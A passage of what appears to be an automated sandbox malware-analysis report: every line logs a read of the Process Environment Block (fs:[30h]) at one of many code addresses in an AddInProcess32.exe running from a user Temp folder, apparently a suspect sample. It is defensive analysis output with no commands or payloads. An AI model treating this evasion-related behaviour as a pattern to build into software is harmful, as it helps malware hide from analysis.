          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_0173B171 mov eax, dword ptr fs:[00000030h]8_2_0173B171
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_0173B171 mov eax, dword ptr fs:[00000030h]8_2_0173B171
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_0173C962 mov eax, dword ptr fs:[00000030h]8_2_0173C962
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_0175B944 mov eax, dword ptr fs:[00000030h]8_2_0175B944
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_0175B944 mov eax, dword ptr fs:[00000030h]8_2_0175B944
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_0176513A mov eax, dword ptr fs:[00000030h]8_2_0176513A
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_0176513A mov eax, dword ptr fs:[00000030h]8_2_0176513A
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_01754120 mov eax, dword ptr fs:[00000030h]8_2_01754120
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_01754120 mov eax, dword ptr fs:[00000030h]8_2_01754120
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_01754120 mov eax, dword ptr fs:[00000030h]8_2_01754120
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_01754120 mov eax, dword ptr fs:[00000030h]8_2_01754120
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_01754120 mov ecx, dword ptr fs:[00000030h]8_2_01754120
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_01739100 mov eax, dword ptr fs:[00000030h]8_2_01739100
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_01739100 mov eax, dword ptr fs:[00000030h]8_2_01739100
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_01739100 mov eax, dword ptr fs:[00000030h]8_2_01739100
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_0173B1E1 mov eax, dword ptr fs:[00000030h]8_2_0173B1E1
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_0173B1E1 mov eax, dword ptr fs:[00000030h]8_2_0173B1E1
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_0173B1E1 mov eax, dword ptr fs:[00000030h]8_2_0173B1E1
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_017C41E8 mov eax, dword ptr fs:[00000030h]8_2_017C41E8
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_017B51BE mov eax, dword ptr fs:[00000030h]8_2_017B51BE
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_017B51BE mov eax, dword ptr fs:[00000030h]8_2_017B51BE
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_017B51BE mov eax, dword ptr fs:[00000030h]8_2_017B51BE
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_017B51BE mov eax, dword ptr fs:[00000030h]8_2_017B51BE
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_017661A0 mov eax, dword ptr fs:[00000030h]8_2_017661A0
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_017661A0 mov eax, dword ptr fs:[00000030h]8_2_017661A0
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_017B69A6 mov eax, dword ptr fs:[00000030h]8_2_017B69A6
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_01762990 mov eax, dword ptr fs:[00000030h]8_2_01762990
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_0176A185 mov eax, dword ptr fs:[00000030h]8_2_0176A185
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_0175C182 mov eax, dword ptr fs:[00000030h]8_2_0175C182
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_017F2073 mov eax, dword ptr fs:[00000030h]8_2_017F2073
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_01750050 mov eax, dword ptr fs:[00000030h]8_2_01750050
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_01750050 mov eax, dword ptr fs:[00000030h]8_2_01750050
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_0176002D mov eax, dword ptr fs:[00000030h]8_2_0176002D
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_0176002D mov eax, dword ptr fs:[00000030h]8_2_0176002D
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_0176002D mov eax, dword ptr fs:[00000030h]8_2_0176002D
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_0176002D mov eax, dword ptr fs:[00000030h]8_2_0176002D
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_0176002D mov eax, dword ptr fs:[00000030h]8_2_0176002D
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_0174B02A mov eax, dword ptr fs:[00000030h]8_2_0174B02A
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_0174B02A mov eax, dword ptr fs:[00000030h]8_2_0174B02A
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_0174B02A mov eax, dword ptr fs:[00000030h]8_2_0174B02A
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_0174B02A mov eax, dword ptr fs:[00000030h]8_2_0174B02A
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_017B7016 mov eax, dword ptr fs:[00000030h]8_2_017B7016
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_017B7016 mov eax, dword ptr fs:[00000030h]8_2_017B7016
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_017B7016 mov eax, dword ptr fs:[00000030h]8_2_017B7016
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_01804015 mov eax, dword ptr fs:[00000030h]8_2_01804015
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_01804015 mov eax, dword ptr fs:[00000030h]8_2_01804015
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_017358EC mov eax, dword ptr fs:[00000030h]8_2_017358EC
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_017CB8D0 mov eax, dword ptr fs:[00000030h]8_2_017CB8D0
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_017CB8D0 mov ecx, dword ptr fs:[00000030h]8_2_017CB8D0
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_017CB8D0 mov eax, dword ptr fs:[00000030h]8_2_017CB8D0
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_017CB8D0 mov eax, dword ptr fs:[00000030h]8_2_017CB8D0
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_017CB8D0 mov eax, dword ptr fs:[00000030h]8_2_017CB8D0
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_017CB8D0 mov eax, dword ptr fs:[00000030h]8_2_017CB8D0
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_0176F0BF mov ecx, dword ptr fs:[00000030h]8_2_0176F0BF
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_0176F0BF mov eax, dword ptr fs:[00000030h]8_2_0176F0BF
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_0176F0BF mov eax, dword ptr fs:[00000030h]8_2_0176F0BF
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_017620A0 mov eax, dword ptr fs:[00000030h]8_2_017620A0
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_017620A0 mov eax, dword ptr fs:[00000030h]8_2_017620A0
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_017620A0 mov eax, dword ptr fs:[00000030h]8_2_017620A0
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_017620A0 mov eax, dword ptr fs:[00000030h]8_2_017620A0
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_017620A0 mov eax, dword ptr fs:[00000030h]8_2_017620A0
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_017620A0 mov eax, dword ptr fs:[00000030h]8_2_017620A0
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_017790AF mov eax, dword ptr fs:[00000030h]8_2_017790AF
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_01739080 mov eax, dword ptr fs:[00000030h]8_2_01739080
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_01801074 mov eax, dword ptr fs:[00000030h]8_2_01801074
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_017B3884 mov eax, dword ptr fs:[00000030h]8_2_017B3884
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_017B3884 mov eax, dword ptr fs:[00000030h]8_2_017B3884
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_01763B7A mov eax, dword ptr fs:[00000030h]8_2_01763B7A
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_01763B7A mov eax, dword ptr fs:[00000030h]8_2_01763B7A
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_0173DB60 mov ecx, dword ptr fs:[00000030h]8_2_0173DB60
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_01805BA5 mov eax, dword ptr fs:[00000030h]8_2_01805BA5
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_0173F358 mov eax, dword ptr fs:[00000030h]8_2_0173F358
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_0173DB40 mov eax, dword ptr fs:[00000030h]8_2_0173DB40
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_017F131B mov eax, dword ptr fs:[00000030h]8_2_017F131B
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_017603E2 mov eax, dword ptr fs:[00000030h]8_2_017603E2
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_017603E2 mov eax, dword ptr fs:[00000030h]8_2_017603E2
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_017603E2 mov eax, dword ptr fs:[00000030h]8_2_017603E2
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_017603E2 mov eax, dword ptr fs:[00000030h]8_2_017603E2
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_017603E2 mov eax, dword ptr fs:[00000030h]8_2_017603E2
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_017603E2 mov eax, dword ptr fs:[00000030h]8_2_017603E2
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_0175DBE9 mov eax, dword ptr fs:[00000030h]8_2_0175DBE9
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_017B53CA mov eax, dword ptr fs:[00000030h]8_2_017B53CA
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_017B53CA mov eax, dword ptr fs:[00000030h]8_2_017B53CA
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_01808B58 mov eax, dword ptr fs:[00000030h]8_2_01808B58
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_01764BAD mov eax, dword ptr fs:[00000030h]8_2_01764BAD
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_01764BAD mov eax, dword ptr fs:[00000030h]8_2_01764BAD
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_01764BAD mov eax, dword ptr fs:[00000030h]8_2_01764BAD
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_01762397 mov eax, dword ptr fs:[00000030h]8_2_01762397
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_0176B390 mov eax, dword ptr fs:[00000030h]8_2_0176B390
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_017F138A mov eax, dword ptr fs:[00000030h]8_2_017F138A
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_01741B8F mov eax, dword ptr fs:[00000030h]8_2_01741B8F
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_01741B8F mov eax, dword ptr fs:[00000030h]8_2_01741B8F
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_017ED380 mov ecx, dword ptr fs:[00000030h]8_2_017ED380
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_0177927A mov eax, dword ptr fs:[00000030h]8_2_0177927A
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_017EB260 mov eax, dword ptr fs:[00000030h]8_2_017EB260
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_017EB260 mov eax, dword ptr fs:[00000030h]8_2_017EB260
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_017FEA55 mov eax, dword ptr fs:[00000030h]8_2_017FEA55
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_017C4257 mov eax, dword ptr fs:[00000030h]8_2_017C4257
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_01739240 mov eax, dword ptr fs:[00000030h]8_2_01739240
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_01739240 mov eax, dword ptr fs:[00000030h]8_2_01739240
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_01739240 mov eax, dword ptr fs:[00000030h]8_2_01739240
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_01739240 mov eax, dword ptr fs:[00000030h]8_2_01739240
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_01774A2C mov eax, dword ptr fs:[00000030h]8_2_01774A2C
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_01774A2C mov eax, dword ptr fs:[00000030h]8_2_01774A2C
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_01735210 mov eax, dword ptr fs:[00000030h]8_2_01735210
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_01735210 mov ecx, dword ptr fs:[00000030h]8_2_01735210
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_01735210 mov eax, dword ptr fs:[00000030h]8_2_01735210
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_01735210 mov eax, dword ptr fs:[00000030h]8_2_01735210
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_0173AA16 mov eax, dword ptr fs:[00000030h]8_2_0173AA16
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_0173AA16 mov eax, dword ptr fs:[00000030h]8_2_0173AA16
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_01753A1C mov eax, dword ptr fs:[00000030h]8_2_01753A1C
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_017FAA16 mov eax, dword ptr fs:[00000030h]8_2_017FAA16
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_017FAA16 mov eax, dword ptr fs:[00000030h]8_2_017FAA16
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_01748A0A mov eax, dword ptr fs:[00000030h]8_2_01748A0A
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_01762AE4 mov eax, dword ptr fs:[00000030h]8_2_01762AE4
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_01762ACB mov eax, dword ptr fs:[00000030h]8_2_01762ACB
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_0174AAB0 mov eax, dword ptr fs:[00000030h]8_2_0174AAB0
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_0174AAB0 mov eax, dword ptr fs:[00000030h]8_2_0174AAB0
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_0176FAB0 mov eax, dword ptr fs:[00000030h]8_2_0176FAB0
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_017352A5 mov eax, dword ptr fs:[00000030h]8_2_017352A5
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_017352A5 mov eax, dword ptr fs:[00000030h]8_2_017352A5
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_017352A5 mov eax, dword ptr fs:[00000030h]8_2_017352A5
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_017352A5 mov eax, dword ptr fs:[00000030h]8_2_017352A5
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_017352A5 mov eax, dword ptr fs:[00000030h]8_2_017352A5
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_0176D294 mov eax, dword ptr fs:[00000030h]8_2_0176D294
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_0176D294 mov eax, dword ptr fs:[00000030h]8_2_0176D294
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_01808A62 mov eax, dword ptr fs:[00000030h]8_2_01808A62
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_0175C577 mov eax, dword ptr fs:[00000030h]8_2_0175C577
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_0175C577 mov eax, dword ptr fs:[00000030h]8_2_0175C577
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_01757D50 mov eax, dword ptr fs:[00000030h]8_2_01757D50
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_018005AC mov eax, dword ptr fs:[00000030h]8_2_018005AC
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_018005AC mov eax, dword ptr fs:[00000030h]8_2_018005AC
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_01773D43 mov eax, dword ptr fs:[00000030h]8_2_01773D43
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_017B3540 mov eax, dword ptr fs:[00000030h]8_2_017B3540
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_01743D34 mov eax, dword ptr fs:[00000030h]8_2_01743D34
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_01743D34 mov eax, dword ptr fs:[00000030h]8_2_01743D34
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_01743D34 mov eax, dword ptr fs:[00000030h]8_2_01743D34
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_01743D34 mov eax, dword ptr fs:[00000030h]8_2_01743D34
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_01743D34 mov eax, dword ptr fs:[00000030h]8_2_01743D34
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_01743D34 mov eax, dword ptr fs:[00000030h]8_2_01743D34
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_01743D34 mov eax, dword ptr fs:[00000030h]8_2_01743D34
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_01743D34 mov eax, dword ptr fs:[00000030h]8_2_01743D34
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_01743D34 mov eax, dword ptr fs:[00000030h]8_2_01743D34
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_01743D34 mov eax, dword ptr fs:[00000030h]8_2_01743D34
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_01743D34 mov eax, dword ptr fs:[00000030h]8_2_01743D34
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_01743D34 mov eax, dword ptr fs:[00000030h]8_2_01743D34
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_01743D34 mov eax, dword ptr fs:[00000030h]8_2_01743D34
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_0173AD30 mov eax, dword ptr fs:[00000030h]8_2_0173AD30
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_017FE539 mov eax, dword ptr fs:[00000030h]8_2_017FE539
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_017BA537 mov eax, dword ptr fs:[00000030h]8_2_017BA537
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_01764D3B mov eax, dword ptr fs:[00000030h]8_2_01764D3B
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_01764D3B mov eax, dword ptr fs:[00000030h]8_2_01764D3B
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_01764D3B mov eax, dword ptr fs:[00000030h]8_2_01764D3B
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_017E8DF1 mov eax, dword ptr fs:[00000030h]8_2_017E8DF1
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_0174D5E0 mov eax, dword ptr fs:[00000030h]8_2_0174D5E0
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_0174D5E0 mov eax, dword ptr fs:[00000030h]8_2_0174D5E0
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_017FFDE2 mov eax, dword ptr fs:[00000030h]8_2_017FFDE2
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_017FFDE2 mov eax, dword ptr fs:[00000030h]8_2_017FFDE2
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_017FFDE2 mov eax, dword ptr fs:[00000030h]8_2_017FFDE2
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_017FFDE2 mov eax, dword ptr fs:[00000030h]8_2_017FFDE2
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_017B6DC9 mov eax, dword ptr fs:[00000030h]8_2_017B6DC9
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_017B6DC9 mov eax, dword ptr fs:[00000030h]8_2_017B6DC9
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_017B6DC9 mov eax, dword ptr fs:[00000030h]8_2_017B6DC9
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_017B6DC9 mov ecx, dword ptr fs:[00000030h]8_2_017B6DC9
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_017B6DC9 mov eax, dword ptr fs:[00000030h]8_2_017B6DC9
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_017B6DC9 mov eax, dword ptr fs:[00000030h]8_2_017B6DC9
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_01808D34 mov eax, dword ptr fs:[00000030h]8_2_01808D34
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_01761DB5 mov eax, dword ptr fs:[00000030h]8_2_01761DB5
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_01761DB5 mov eax, dword ptr fs:[00000030h]8_2_01761DB5
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_01761DB5 mov eax, dword ptr fs:[00000030h]8_2_01761DB5
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_017635A1 mov eax, dword ptr fs:[00000030h]8_2_017635A1
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_0176FD9B mov eax, dword ptr fs:[00000030h]8_2_0176FD9B
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_0176FD9B mov eax, dword ptr fs:[00000030h]8_2_0176FD9B
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_01762581 mov eax, dword ptr fs:[00000030h]8_2_01762581
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_01762581 mov eax, dword ptr fs:[00000030h]8_2_01762581
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_01762581 mov eax, dword ptr fs:[00000030h]8_2_01762581
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_01762581 mov eax, dword ptr fs:[00000030h]8_2_01762581
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_01732D8A mov eax, dword ptr fs:[00000030h]8_2_01732D8A
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_01732D8A mov eax, dword ptr fs:[00000030h]8_2_01732D8A
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_01732D8A mov eax, dword ptr fs:[00000030h]8_2_01732D8A
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_01732D8A mov eax, dword ptr fs:[00000030h]8_2_01732D8A
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_01732D8A mov eax, dword ptr fs:[00000030h]8_2_01732D8A
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_0175746D mov eax, dword ptr fs:[00000030h]8_2_0175746D
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_017CC450 mov eax, dword ptr fs:[00000030h]8_2_017CC450
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_017CC450 mov eax, dword ptr fs:[00000030h]8_2_017CC450
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_0176A44B mov eax, dword ptr fs:[00000030h]8_2_0176A44B
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_01808CD6 mov eax, dword ptr fs:[00000030h]8_2_01808CD6
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_0176BC2C mov eax, dword ptr fs:[00000030h]8_2_0176BC2C
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_017B6C0A mov eax, dword ptr fs:[00000030h]8_2_017B6C0A
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_017B6C0A mov eax, dword ptr fs:[00000030h]8_2_017B6C0A
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_017B6C0A mov eax, dword ptr fs:[00000030h]8_2_017B6C0A
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_017B6C0A mov eax, dword ptr fs:[00000030h]8_2_017B6C0A
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_017F1C06 mov eax, dword ptr fs:[00000030h]8_2_017F1C06
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_017F1C06 mov eax, dword ptr fs:[00000030h]8_2_017F1C06
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_017F1C06 mov eax, dword ptr fs:[00000030h]8_2_017F1C06
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_017F1C06 mov eax, dword ptr fs:[00000030h]8_2_017F1C06
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_017F1C06 mov eax, dword ptr fs:[00000030h]8_2_017F1C06
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_017F1C06 mov eax, dword ptr fs:[00000030h]8_2_017F1C06
